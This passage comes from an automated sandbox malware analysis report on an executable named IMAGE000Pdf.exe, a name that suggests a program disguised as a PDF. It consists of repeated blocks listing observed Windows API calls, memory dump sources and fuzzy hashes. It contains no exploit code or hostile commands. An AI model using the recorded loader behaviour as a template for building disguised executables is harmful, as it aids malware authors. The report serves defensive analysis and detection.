                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: Call
                                      • API String ID: 3356406503-1824292864
                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 696 4059d7-405a08 CreateProcessW 697 405a16-405a17 696->697 698 405a0a-405a13 CloseHandle 696->698 698->697
                                      APIs
                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                      • CloseHandle.KERNEL32(?), ref: 00405A0D
                                      Strings
                                      • Error launching installer, xrefs: 004059EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                      • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                      • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                      • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                      • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                      • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                      • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                        • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                      • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                      • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                      • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                      • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                      • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                      • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                      APIs
                                      • VirtualProtect.KERNELBASE(7002505C,00000004,00000040,7002504C), ref: 700229FD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: e2575b672e8502835320f404f4d93be179f39fe10db0a07c1d1efe123e5e784b
                                      • Instruction ID: 84afa4e3adc85ce7e6ad48295d1f59f5a6bda032e6948186daa888b1507e477b
                                      • Opcode Fuzzy Hash: e2575b672e8502835320f404f4d93be179f39fe10db0a07c1d1efe123e5e784b
                                      • Instruction Fuzzy Hash: FEF092B2500280DEE350CF2A8CC4B093BE0B708737BB0456AE688D6262E3744446CF9D
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                      • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                      • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                      • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                      APIs
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                      • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                      • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                      • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
